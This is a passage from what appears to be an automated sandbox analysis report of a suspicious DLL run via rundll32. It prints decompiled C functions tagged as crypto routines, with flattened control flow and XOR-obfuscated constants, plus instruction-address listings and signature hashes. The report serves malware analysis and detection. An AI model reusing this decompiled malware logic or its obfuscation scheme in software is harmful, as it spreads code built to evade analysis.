												while(1) {
													L1:
													_t369 = 0x667bbe4;
													goto L2;
												}
											}
										}
									}
								}
							}
						}
						__eflags = 0;
						return 0;
						goto L31;
					}
					E100078F0(_t393,  *(_t446 + 0x44),  *(_t446 + 0x44),  *((intOrPtr*)(_t446 + 0x60)),  *(_t446 + 0x54));
					_t446 = _t446 + 0xc;
					_t395 = 0x35dcba61;
					_t369 = 0x667bbe4;
					goto L29;
				}
			}






















                                                                        0x10016b4b
                                                                        0x10016b58
                                                                        0x10016b61
                                                                        0x10016b6c
                                                                        0x10016b71
                                                                        0x10016b79
                                                                        0x10016b7e
                                                                        0x10016b86
                                                                        0x10016b8e
                                                                        0x10016b96
                                                                        0x10016b9e
                                                                        0x10016ba3
                                                                        0x10016bab
                                                                        0x10016bb3
                                                                        0x10016bbb
                                                                        0x10016bc2
                                                                        0x10016bcb
                                                                        0x10016bcf
                                                                        0x10016bd4
                                                                        0x10016bdc
                                                                        0x10016be4
                                                                        0x10016bef
                                                                        0x10016bf2
                                                                        0x10016bf6
                                                                        0x10016bfe
                                                                        0x10016c09
                                                                        0x10016c14
                                                                        0x10016c1f
                                                                        0x10016c27
                                                                        0x10016c2c
                                                                        0x10016c34
                                                                        0x10016c39
                                                                        0x10016c41
                                                                        0x10016c49
                                                                        0x10016c51
                                                                        0x10016c59
                                                                        0x10016c64
                                                                        0x10016c6f
                                                                        0x10016c7a
                                                                        0x10016c90
                                                                        0x10016c97
                                                                        0x10016ca2
                                                                        0x10016caa
                                                                        0x10016caf
                                                                        0x10016cb7
                                                                        0x10016cbf
                                                                        0x10016ccb
                                                                        0x10016cd0
                                                                        0x10016cd6
                                                                        0x10016cdb
                                                                        0x10016ce3
                                                                        0x10016ceb
                                                                        0x10016cf6
                                                                        0x10016d01
                                                                        0x10016d0c
                                                                        0x10016d14
                                                                        0x10016d1c
                                                                        0x10016d24
                                                                        0x10016d29
                                                                        0x10016d31
                                                                        0x10016d3d
                                                                        0x10016d40
                                                                        0x10016d44
                                                                        0x10016d4c
                                                                        0x10016d5c
                                                                        0x10016d61
                                                                        0x10016d67
                                                                        0x10016d6f
                                                                        0x10016d77
                                                                        0x10016d82
                                                                        0x10016d8a
                                                                        0x10016d95
                                                                        0x10016da8
                                                                        0x10016dab
                                                                        0x10016db2
                                                                        0x10016dbd
                                                                        0x10016dc5
                                                                        0x10016dca
                                                                        0x10016dcf
                                                                        0x10016dd7
                                                                        0x10016ddf
                                                                        0x10016de4
                                                                        0x10016de9
                                                                        0x10016df1
                                                                        0x10016df9
                                                                        0x10016e01
                                                                        0x10016e09
                                                                        0x10016e11
                                                                        0x10016e1e
                                                                        0x10016e28
                                                                        0x10016e2c
                                                                        0x10016e34
                                                                        0x10016e3c
                                                                        0x10016e44
                                                                        0x10016e49
                                                                        0x10016e51
                                                                        0x10016e59
                                                                        0x10016e5e
                                                                        0x10016e66
                                                                        0x10016e6e
                                                                        0x10016e76
                                                                        0x10016e7e
                                                                        0x10016e83
                                                                        0x10016e8b
                                                                        0x10016e93
                                                                        0x10016e9e
                                                                        0x10016ea9
                                                                        0x10016eb4
                                                                        0x10016ebc
                                                                        0x10016ec1
                                                                        0x10016ec9
                                                                        0x10016ece
                                                                        0x10016ed6
                                                                        0x10016ee1
                                                                        0x10016eec
                                                                        0x10016ef7
                                                                        0x10016eff
                                                                        0x10016f07
                                                                        0x10016f0f
                                                                        0x10016f14
                                                                        0x10016f1c
                                                                        0x10016f27
                                                                        0x10016f2f
                                                                        0x10016f3a
                                                                        0x10016f42
                                                                        0x10016f4a
                                                                        0x10016f52
                                                                        0x10016f5a
                                                                        0x10016f62
                                                                        0x10016f6a
                                                                        0x10016f74
                                                                        0x10016f86
                                                                        0x10016f8b
                                                                        0x10016f8f
                                                                        0x10016f96
                                                                        0x10016fa1
                                                                        0x10016fac
                                                                        0x10016fb4
                                                                        0x10016fbf
                                                                        0x10016fca
                                                                        0x10016fd5
                                                                        0x10016fe0
                                                                        0x10016fe8
                                                                        0x10016ff0
                                                                        0x10016ff8
                                                                        0x10017000
                                                                        0x10017008
                                                                        0x10017010
                                                                        0x10017018
                                                                        0x10017020
                                                                        0x10017028
                                                                        0x10017030
                                                                        0x10017035
                                                                        0x1001703a
                                                                        0x10017042
                                                                        0x1001704a
                                                                        0x10017052
                                                                        0x10017057
                                                                        0x1001705f
                                                                        0x1001706d
                                                                        0x10017071
                                                                        0x10017075
                                                                        0x10017079
                                                                        0x1001707d
                                                                        0x10017087
                                                                        0x1001708b
                                                                        0x10017093
                                                                        0x10017093
                                                                        0x10017093
                                                                        0x00000000
                                                                        0x10017098
                                                                        0x100170a6
                                                                        0x10017232
                                                                        0x10017237
                                                                        0x1001723a
                                                                        0x1001723c
                                                                        0x10017284
                                                                        0x1001723e
                                                                        0x1001723e
                                                                        0x10017240
                                                                        0x10017240
                                                                        0x10017244
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10017246
                                                                        0x1001724a
                                                                        0x10017262
                                                                        0x10017267
                                                                        0x1001726a
                                                                        0x1001726c
                                                                        0x1001727a
                                                                        0x1001727b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10017294
                                                                        0x10017294
                                                                        0x00000000
                                                                        0x1001726e
                                                                        0x1001726e
                                                                        0x10017270
                                                                        0x10017272
                                                                        0x1001728d
                                                                        0x10017274
                                                                        0x10017274
                                                                        0x10017240
                                                                        0x10017244
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10017244
                                                                        0x00000000
                                                                        0x10017272
                                                                        0x10017240
                                                                        0x10017298
                                                                        0x10017298
                                                                        0x1001729a
                                                                        0x100172be
                                                                        0x100172c3
                                                                        0x00000000
                                                                        0x1001729c
                                                                        0x1001729c
                                                                        0x100172ae
                                                                        0x100172b4
                                                                        0x00000000
                                                                        0x100172b4
                                                                        0x00000000
                                                                        0x100170ac
                                                                        0x100170b2
                                                                        0x100171bf
                                                                        0x100171e5
                                                                        0x100171ea
                                                                        0x100171ec
                                                                        0x100171f1
                                                                        0x100171f6
                                                                        0x10017093
                                                                        0x10017093
                                                                        0x10017093
                                                                        0x00000000
                                                                        0x10017093
                                                                        0x100170b8
                                                                        0x100170be
                                                                        0x10017179
                                                                        0x10017185
                                                                        0x10017188
                                                                        0x10017191
                                                                        0x10017193
                                                                        0x10017199
                                                                        0x100171a0
                                                                        0x00000000
                                                                        0x100170c4
                                                                        0x100170ca
                                                                        0x1001716b
                                                                        0x00000000
                                                                        0x100170d0
                                                                        0x100170d6
                                                                        0x1001714e
                                                                        0x10017153
                                                                        0x10017155
                                                                        0x10017158
                                                                        0x1001715b
                                                                        0x10017161
                                                                        0x10017093
                                                                        0x10017093
                                                                        0x10017093
                                                                        0x00000000
                                                                        0x10017093
                                                                        0x10017093
                                                                        0x100170d8
                                                                        0x100170de
                                                                        0x100172ee
                                                                        0x100172ee
                                                                        0x100172f4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100170e4
                                                                        0x10017101
                                                                        0x10017106
                                                                        0x10017109
                                                                        0x10017093
                                                                        0x10017093
                                                                        0x10017093
                                                                        0x00000000
                                                                        0x10017093
                                                                        0x10017093
                                                                        0x100170de
                                                                        0x100170d6
                                                                        0x100170ca
                                                                        0x100170be
                                                                        0x100170b2
                                                                        0x100172fd
                                                                        0x10017306
                                                                        0x00000000
                                                                        0x10017306
                                                                        0x100172dc
                                                                        0x100172e1
                                                                        0x100172e4
                                                                        0x100172e9
                                                                        0x00000000
                                                                        0x100172e9

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #7}$'c$)$D$[e$kg$ns$vc$yw$O
                                                                        • API String ID: 0-1013673946
                                                                        • Opcode ID: 3dacd4352d9c33c1731b4215249d3e15c2e411b10bbaa018ca579d51b917f277
                                                                        • Instruction ID: f2670378fa826e8d31e23e03b62a8b8a54816961439a19b05cfa054466784345
                                                                        • Opcode Fuzzy Hash: 3dacd4352d9c33c1731b4215249d3e15c2e411b10bbaa018ca579d51b917f277
                                                                        • Instruction Fuzzy Hash: 250211711083809FE3A8CF21C58AA5FBBF1FBC5758F10891DE59A862A0D7B59949CF43
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000C07D, Relevance: 12.8, Strings: 10, Instructions: 296COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 95%
                                                                        			E1000C07D(intOrPtr* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				void* _t249;
				intOrPtr _t273;
				intOrPtr _t275;
				void* _t292;
				signed int _t294;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				intOrPtr* _t318;
				signed int _t319;
				intOrPtr* _t322;
				signed int* _t324;
				void* _t327;

				_push(_a8);
				_t322 = __edx;
				_t318 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t249);
				_v16 = 0x7669;
				_t324 =  &(( &_v120)[4]);
				_v16 = _v16 << 0xc;
				_v16 = _v16 ^ 0x0766ed4f;
				_t292 = 0;
				_v96 = 0xa3dc;
				_t319 = 0xc83da09;
				_v96 = _v96 << 0x10;
				_v96 = _v96 >> 0xb;
				_v96 = _v96 ^ 0xd5d56a35;
				_v96 = _v96 ^ 0xd5c17d1d;
				_v88 = 0x57ea;
				_t294 = 0x44;
				_v88 = _v88 * 0x5e;
				_v88 = _v88 * 0x6d;
				_v88 = _v88 ^ 0xe3cf2272;
				_v88 = _v88 ^ 0xee71a60d;
				_v92 = 0x3245;
				_v92 = _v92 >> 9;
				_v92 = _v92 >> 7;
				_v92 = _v92 ^ 0xb732a7fa;
				_v92 = _v92 ^ 0xb732c7ae;
				_v40 = 0x3209;
				_v40 = _v40 >> 0xc;
				_v40 = _v40 + 0xffff23da;
				_v40 = _v40 ^ 0xffff5649;
				_v44 = 0xfee;
				_v44 = _v44 * 0x3a;
				_v44 = _v44 + 0xffff023b;
				_v44 = _v44 ^ 0x00028194;
				_v20 = 0x6fe9;
				_v20 = _v20 ^ 0x83bafbf8;
				_v20 = _v20 ^ 0x83baebed;
				_v52 = 0x55fd;
				_v52 = _v52 >> 3;
				_v52 = _v52 / _t294;
				_v52 = _v52 ^ 0x00006fa3;
				_v56 = 0x7487;
				_t295 = 0x59;
				_v56 = _v56 / _t295;
				_v56 = _v56 + 0xca5f;
				_v56 = _v56 ^ 0x000097d2;
				_v60 = 0x67db;
				_v60 = _v60 + 0xffff6270;
				_v60 = _v60 ^ 0xc598274b;
				_v60 = _v60 ^ 0x3a67f21b;
				_v24 = 0x2803;
				_v24 = _v24 ^ 0x5736d0c5;
				_v24 = _v24 ^ 0x5736adce;
				_v28 = 0x6556;
				_v28 = _v28 ^ 0x16a4143a;
				_v28 = _v28 ^ 0x16a44fe2;
				_v64 = 0x2652;
				_v64 = _v64 << 1;
				_v64 = _v64 * 0x60;
				_v64 = _v64 ^ 0x001ca86e;
				_v116 = 0xa093;
				_v116 = _v116 | 0x704eabb3;
				_v116 = _v116 >> 0xe;
				_t296 = 0x26;
				_v116 = _v116 * 0x25;
				_v116 = _v116 ^ 0x0040c4bc;
				_v80 = 0xb33b;
				_v80 = _v80 >> 6;
				_v80 = _v80 >> 0xd;
				_v80 = _v80 ^ 0x000057d5;
				_v120 = 0xdf18;
				_v120 = _v120 | 0xefceebfd;
				_v120 = _v120 + 0xf560;
				_v120 = _v120 ^ 0xefcfb7f2;
				_v84 = 0x84bb;
				_v84 = _v84 ^ 0xda107d20;
				_v84 = _v84 << 8;
				_v84 = _v84 ^ 0x10f9b229;
				_v68 = 0xeff9;
				_v68 = _v68 / _t296;
				_v68 = _v68 >> 0x10;
				_v68 = _v68 ^ 0x00000bea;
				_v100 = 0x20d7;
				_v100 = _v100 >> 3;
				_t297 = 0x59;
				_v100 = _v100 * 0x53;
				_v100 = _v100 >> 6;
				_v100 = _v100 ^ 0x00004dbe;
				_v104 = 0x1634;
				_v104 = _v104 | 0xa08b3358;
				_v104 = _v104 * 0x64;
				_v104 = _v104 | 0xcfa784de;
				_v104 = _v104 ^ 0xffe789e4;
				_v108 = 0x3cd;
				_v108 = _v108 | 0xda478b90;
				_v108 = _v108 ^ 0x76068ebd;
				_v108 = _v108 * 0x60;
				_v108 = _v108 ^ 0x986216c6;
				_v112 = 0x5ea3;
				_v112 = _v112 * 0x50;
				_v112 = _v112 / _t297;
				_v112 = _v112 >> 6;
				_v112 = _v112 ^ 0x0000527a;
				_v32 = 0x8038;
				_v32 = _v32 + 0xffff845e;
				_v32 = _v32 ^ 0x00005668;
				_v72 = 0x3956;
				_v72 = _v72 ^ 0xc34d822a;
				_v72 = _v72 | 0x19b55510;
				_v72 = _v72 ^ 0xdbfdff55;
				_v36 = 0x9b67;
				_v36 = _v36 >> 5;
				_v36 = _v36 ^ 0x00004f8e;
				_v76 = 0x4339;
				_v76 = _v76 + 0xfffff79c;
				_v76 = _v76 + 0x9b18;
				_v76 = _v76 ^ 0x00009e95;
				while(1) {
					_t268 = _v48;
					while(1) {
						L2:
						_t327 = _t319 - 0x26339395;
						if(_t327 > 0) {
							break;
						}
						if(_t327 == 0) {
							_push(_t297);
							E10005B05(_v68,  *((intOrPtr*)( *0x100221b4 + 0x14)), _t297, _v8, _v100, _v104, _t297, _v108, _v112, _v32, _v12);
							_t324 =  &(_t324[0xa]);
							_t297 = 1;
							_t319 = 0x1081595e;
							_t292 =  !=  ? 1 : _t292;
							while(1) {
								_t268 = _v48;
								goto L2;
							}
						}
						if(_t319 == 0xc83da09) {
							_t319 = 0x357aa1fe;
							continue;
						}
						if(_t319 == 0x1081595e) {
							E1000D7B0(_v12);
							_t297 = _t297;
							_t319 = 0x172012b8;
							while(1) {
								_t268 = _v48;
								goto L2;
							}
						}
						if(_t319 == 0x16b83fff) {
							_t319 = 0x2f4aaa5a;
							continue;
						}
						if(_t319 == 0x172012b8) {
							if(_t292 == 0) {
								E100091CD(_v88, _v92, _v40,  *_t318, _v44);
							}
							L29:
							return _t292;
						}
						if(_t319 != 0x24206dd0) {
							L25:
							if(_t319 == 0x2ef876fe) {
								goto L29;
							}
							while(1) {
								_t268 = _v48;
								goto L2;
							}
						}
						E10001BB6(_t318 + 4, _v116, _t297,  *_t318, _v12, _v80,  *((intOrPtr*)( *0x100221b4)), _v120, _v84);
						_t324 =  &(_t324[8]);
						asm("sbb esi, esi");
						_t319 = (_t319 & 0x15b23a37) + 0x1081595e;
						while(1) {
							_t268 = _v48;
							goto L2;
						}
					}
					if(_t319 == 0x2f4aaa5a) {
						 *((intOrPtr*)(_t318 + 4)) = _a4 - 0x74;
						_t273 = E100157E8( *((intOrPtr*)(_t318 + 4)));
						 *_t318 = _t273;
						_t297 = _t297;
						if(_t273 == 0) {
							_t319 = 0x2ef876fe;
							goto L25;
						}
						_t275 =  *_t322;
						_t319 = 0x357ef6c4;
						_v8 = _t275;
						_v4 = _t275 + 0x74;
						_t268 = _a4 - 0x74;
						_v48 = _a4 - 0x74;
						goto L2;
					}
					if(_t319 == 0x357aa1fe) {
						if(_a4 < 0x74) {
							goto L29;
						}
						_t319 = 0x16b83fff;
						goto L2;
					}
					if(_t319 == 0x357ef6c4) {
						_t297 = _v20;
						E1000CB42(_t297, _v52, _v56, _t297,  &_v12,  *((intOrPtr*)( *0x100221b4 + 0x10)), _t297, _v60);
						_t324 =  &(_t324[6]);
						asm("sbb esi, esi");
						_t319 = (_t319 & 0x23df12f3) + 0x172012b8;
						while(1) {
							_t268 = _v48;
							goto L2;
						}
					}
					if(_t319 != 0x3aff25ab) {
						goto L25;
					}
					_t297 = _v24;
					E10009970(_t297, _v4, _v28,  *_t318, _t268, _v64);
					_t324 =  &(_t324[4]);
					_t319 = 0x24206dd0;
				}
			}














































                                                                        0x1000c084
                                                                        0x1000c08b
                                                                        0x1000c08d
                                                                        0x1000c08f
                                                                        0x1000c096
                                                                        0x1000c097
                                                                        0x1000c098
                                                                        0x1000c09d
                                                                        0x1000c0a8
                                                                        0x1000c0ab
                                                                        0x1000c0b2
                                                                        0x1000c0ba
                                                                        0x1000c0bc
                                                                        0x1000c0c4
                                                                        0x1000c0c9
                                                                        0x1000c0ce
                                                                        0x1000c0d3
                                                                        0x1000c0db
                                                                        0x1000c0e3
                                                                        0x1000c0f2
                                                                        0x1000c0f5
                                                                        0x1000c0fe
                                                                        0x1000c102
                                                                        0x1000c10a
                                                                        0x1000c112
                                                                        0x1000c11a
                                                                        0x1000c11f
                                                                        0x1000c124
                                                                        0x1000c12c
                                                                        0x1000c134
                                                                        0x1000c13c
                                                                        0x1000c141
                                                                        0x1000c149
                                                                        0x1000c151
                                                                        0x1000c15e
                                                                        0x1000c162
                                                                        0x1000c16a
                                                                        0x1000c172
                                                                        0x1000c17a
                                                                        0x1000c182
                                                                        0x1000c18a
                                                                        0x1000c192
                                                                        0x1000c19f
                                                                        0x1000c1a3
                                                                        0x1000c1ab
                                                                        0x1000c1b7
                                                                        0x1000c1ba
                                                                        0x1000c1be
                                                                        0x1000c1c6
                                                                        0x1000c1ce
                                                                        0x1000c1d6
                                                                        0x1000c1de
                                                                        0x1000c1e6
                                                                        0x1000c1ee
                                                                        0x1000c1f6
                                                                        0x1000c1fe
                                                                        0x1000c206
                                                                        0x1000c20e
                                                                        0x1000c216
                                                                        0x1000c21e
                                                                        0x1000c226
                                                                        0x1000c22f
                                                                        0x1000c233
                                                                        0x1000c23b
                                                                        0x1000c243
                                                                        0x1000c24b
                                                                        0x1000c259
                                                                        0x1000c25c
                                                                        0x1000c260
                                                                        0x1000c268
                                                                        0x1000c270
                                                                        0x1000c275
                                                                        0x1000c27a
                                                                        0x1000c282
                                                                        0x1000c28a
                                                                        0x1000c292
                                                                        0x1000c29a
                                                                        0x1000c2a2
                                                                        0x1000c2aa
                                                                        0x1000c2b2
                                                                        0x1000c2b7
                                                                        0x1000c2bf
                                                                        0x1000c2cf
                                                                        0x1000c2d3
                                                                        0x1000c2d8
                                                                        0x1000c2e0
                                                                        0x1000c2e8
                                                                        0x1000c2f2
                                                                        0x1000c2f3
                                                                        0x1000c2f7
                                                                        0x1000c2fc
                                                                        0x1000c304
                                                                        0x1000c30c
                                                                        0x1000c319
                                                                        0x1000c31d
                                                                        0x1000c325
                                                                        0x1000c32d
                                                                        0x1000c335
                                                                        0x1000c33d
                                                                        0x1000c34a
                                                                        0x1000c34e
                                                                        0x1000c356
                                                                        0x1000c363
                                                                        0x1000c36d
                                                                        0x1000c371
                                                                        0x1000c376
                                                                        0x1000c37e
                                                                        0x1000c386
                                                                        0x1000c38e
                                                                        0x1000c396
                                                                        0x1000c39e
                                                                        0x1000c3a6
                                                                        0x1000c3ae
                                                                        0x1000c3b6
                                                                        0x1000c3be
                                                                        0x1000c3c3
                                                                        0x1000c3cb
                                                                        0x1000c3d3
                                                                        0x1000c3db
                                                                        0x1000c3e3
                                                                        0x1000c3eb
                                                                        0x1000c3eb
                                                                        0x1000c3ef
                                                                        0x1000c3ef
                                                                        0x1000c3ef
                                                                        0x1000c3f5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000c3fb
                                                                        0x1000c4af
                                                                        0x1000c4e1
                                                                        0x1000c4e8
                                                                        0x1000c4eb
                                                                        0x1000c4ec
                                                                        0x1000c4f3
                                                                        0x1000c3eb
                                                                        0x1000c3eb
                                                                        0x00000000
                                                                        0x1000c3eb
                                                                        0x1000c3eb
                                                                        0x1000c407
                                                                        0x1000c4a5
                                                                        0x00000000
                                                                        0x1000c4a5
                                                                        0x1000c413
                                                                        0x1000c494
                                                                        0x1000c49a
                                                                        0x1000c49b
                                                                        0x1000c3eb
                                                                        0x1000c3eb
                                                                        0x00000000
                                                                        0x1000c3eb
                                                                        0x1000c3eb
                                                                        0x1000c41b
                                                                        0x1000c476
                                                                        0x00000000
                                                                        0x1000c476
                                                                        0x1000c423
                                                                        0x1000c605
                                                                        0x1000c619
                                                                        0x1000c61e
                                                                        0x1000c624
                                                                        0x1000c62a
                                                                        0x1000c62a
                                                                        0x1000c42f
                                                                        0x1000c5f6
                                                                        0x1000c5fc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000c3eb
                                                                        0x1000c3eb
                                                                        0x00000000
                                                                        0x1000c3eb
                                                                        0x1000c3eb
                                                                        0x1000c459
                                                                        0x1000c45e
                                                                        0x1000c463
                                                                        0x1000c46b
                                                                        0x1000c3eb
                                                                        0x1000c3eb
                                                                        0x00000000
                                                                        0x1000c3eb
                                                                        0x1000c3eb
                                                                        0x1000c501
                                                                        0x1000c5ae
                                                                        0x1000c5bd
                                                                        0x1000c5c2
                                                                        0x1000c5c4
                                                                        0x1000c5c7
                                                                        0x1000c5f1
                                                                        0x00000000
                                                                        0x1000c5f1
                                                                        0x1000c5c9
                                                                        0x1000c5cc
                                                                        0x1000c5d1
                                                                        0x1000c5db
                                                                        0x1000c5e5
                                                                        0x1000c5e8
                                                                        0x00000000
                                                                        0x1000c5e8
                                                                        0x1000c50d
                                                                        0x1000c598
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000c59e
                                                                        0x00000000
                                                                        0x1000c59e
                                                                        0x1000c519
                                                                        0x1000c570
                                                                        0x1000c577
                                                                        0x1000c57c
                                                                        0x1000c581
                                                                        0x1000c589
                                                                        0x1000c3eb
                                                                        0x1000c3eb
                                                                        0x00000000
                                                                        0x1000c3eb
                                                                        0x1000c3eb
                                                                        0x1000c521
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000c539
                                                                        0x1000c540
                                                                        0x1000c545
                                                                        0x1000c548
                                                                        0x1000c548

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2$9C$E2$R&$V9$Ve$hV$iv$zR$o
                                                                        • API String ID: 0-2458788695
                                                                        • Opcode ID: cde8fb4cfcbe2daa5d61ed075c86a642f744566edfd9abd8c45c0297c1402669
                                                                        • Instruction ID: b889abdc94fa4b4a1718a1273814a5ecfb06dcf28629aab6822f019f45cdcd48
                                                                        • Opcode Fuzzy Hash: cde8fb4cfcbe2daa5d61ed075c86a642f744566edfd9abd8c45c0297c1402669
                                                                        • Instruction Fuzzy Hash: 1AE1217240C3819FE358CF64C98A90BBBF0FB84794F60891DF595862A4D7B59A49CF82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10015DAA, Relevance: 12.8, Strings: 10, Instructions: 290COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10015DAA(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				signed int _v60;
				unsigned int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				unsigned int _v108;
				signed int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				void* _t312;
				void* _t317;
				void* _t318;
				void* _t320;
				void* _t330;
				void* _t335;
				void* _t337;
				void* _t338;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				intOrPtr _t365;
				void* _t366;
				signed int* _t368;
				void* _t376;

				_t368 =  &_v144;
				_v16 = 0x2f11e5;
				_v12 = 0x125d40;
				_t365 = 0;
				_t338 = __ecx;
				_v8 = 0;
				_t366 = 0x358f7696;
				_v4 = 0;
				_v132 = 0xdcb7;
				_t340 = 0x6f;
				_v132 = _v132 / _t340;
				_t341 = 0x48;
				_v132 = _v132 / _t341;
				_v132 = _v132 + 0xfffff0ee;
				_v132 = _v132 ^ 0xffff84cc;
				_v28 = 0x3643;
				_v28 = _v28 + 0xffff4038;
				_v28 = _v28 ^ 0xffff36c8;
				_v84 = 0x2397;
				_v84 = _v84 ^ 0x715e3b83;
				_v84 = _v84 + 0xb2b;
				_v84 = _v84 ^ 0x715e6259;
				_v92 = 0x7fa0;
				_t342 = 0xd;
				_v92 = _v92 * 0x4c;
				_v92 = _v92 | 0x3035aed7;
				_v92 = _v92 ^ 0x3035c4a3;
				_v32 = 0x3c7c;
				_v32 = _v32 << 0xd;
				_v32 = _v32 ^ 0x078f867d;
				_v124 = 0xd3cb;
				_v124 = _v124 << 0xa;
				_v124 = _v124 / _t342;
				_v124 = _v124 << 3;
				_v124 = _v124 ^ 0x020946e5;
				_v68 = 0x8f72;
				_t343 = 0x68;
				_v68 = _v68 / _t343;
				_v68 = _v68 * 0x26;
				_v68 = _v68 ^ 0x00002cf4;
				_v76 = 0xb700;
				_v76 = _v76 >> 0xf;
				_v76 = _v76 | 0x3f1719c8;
				_v76 = _v76 ^ 0x3f176b52;
				_v80 = 0x2c59;
				_v80 = _v80 | 0xf2308069;
				_v80 = _v80 ^ 0x9e8457c3;
				_v80 = _v80 ^ 0x6cb4c9eb;
				_v128 = 0xbaba;
				_v128 = _v128 | 0x1d3dda76;
				_v128 = _v128 ^ 0x5e21119f;
				_v128 = _v128 + 0xffffe525;
				_v128 = _v128 ^ 0x431cc63a;
				_v72 = 0xdca3;
				_v72 = _v72 * 0x15;
				_v72 = _v72 * 0x47;
				_v72 = _v72 ^ 0x05054403;
				_v88 = 0x680b;
				_v88 = _v88 ^ 0xdb65b47e;
				_v88 = _v88 + 0xffff3c9f;
				_v88 = _v88 ^ 0xdb654b07;
				_v40 = 0xa6e8;
				_t344 = 0x51;
				_v40 = _v40 * 0x47;
				_v40 = _v40 ^ 0x002e2907;
				_v48 = 0xe244;
				_v48 = _v48 + 0xe070;
				_v48 = _v48 ^ 0x0001a9ff;
				_v52 = 0xb9c7;
				_v52 = _v52 >> 1;
				_v52 = _v52 ^ 0x000022fe;
				_v36 = 0xc27e;
				_v36 = _v36 * 0x12;
				_v36 = _v36 ^ 0x000dd66f;
				_v120 = 0xc6aa;
				_v120 = _v120 | 0x840c2d9c;
				_v120 = _v120 << 5;
				_v120 = _v120 << 9;
				_v120 = _v120 ^ 0x3beff1bc;
				_v64 = 0x26b9;
				_v64 = _v64 * 0x17;
				_v64 = _v64 >> 0xb;
				_v64 = _v64 ^ 0x0000525e;
				_v136 = 0x331a;
				_v136 = _v136 ^ 0xe6942da9;
				_v136 = _v136 / _t344;
				_v136 = _v136 + 0x45e7;
				_v136 = _v136 ^ 0x02d904bd;
				_v60 = 0xefe2;
				_v60 = _v60 ^ 0xb768827f;
				_t345 = 0x5a;
				_v60 = _v60 / _t345;
				_v60 = _v60 ^ 0x0209f4de;
				_v44 = 0x996d;
				_v44 = _v44 + 0xeb77;
				_v44 = _v44 ^ 0x0001ce3e;
				_v140 = 0xaea2;
				_v140 = _v140 + 0xffff7943;
				_v140 = _v140 + 0xffff713c;
				_v140 = _v140 << 1;
				_v140 = _v140 ^ 0xffff0950;
				_v144 = 0xe8a6;
				_v144 = _v144 + 0xffff5365;
				_v144 = _v144 << 9;
				_v144 = _v144 + 0xffffbb33;
				_v144 = _v144 ^ 0x0077ca81;
				_v104 = 0x7543;
				_v104 = _v104 + 0xd62a;
				_v104 = _v104 | 0x34ced3cc;
				_v104 = _v104 ^ 0x34cfd1d4;
				_v96 = 0x479b;
				_v96 = _v96 >> 3;
				_v96 = _v96 * 0x1b;
				_v96 = _v96 ^ 0x0000f726;
				_v20 = 0xd19;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x00019a3d;
				_v112 = 0x2f15;
				_v112 = _v112 ^ 0x9e3db849;
				_v112 = _v112 >> 9;
				_v112 = _v112 * 0x50;
				_v112 = _v112 ^ 0x18b9e394;
				_v56 = 0xf91;
				_v56 = _v56 << 0xa;
				_v56 = _v56 ^ 0x003e129f;
				_v108 = 0x8d56;
				_v108 = _v108 << 0xf;
				_v108 = _v108 ^ 0xf3b2534b;
				_v108 = _v108 >> 0x10;
				_v108 = _v108 ^ 0x0000885e;
				_v116 = 0x58ab;
				_v116 = _v116 ^ 0x39457795;
				_v116 = _v116 << 7;
				_v116 = _v116 >> 0xa;
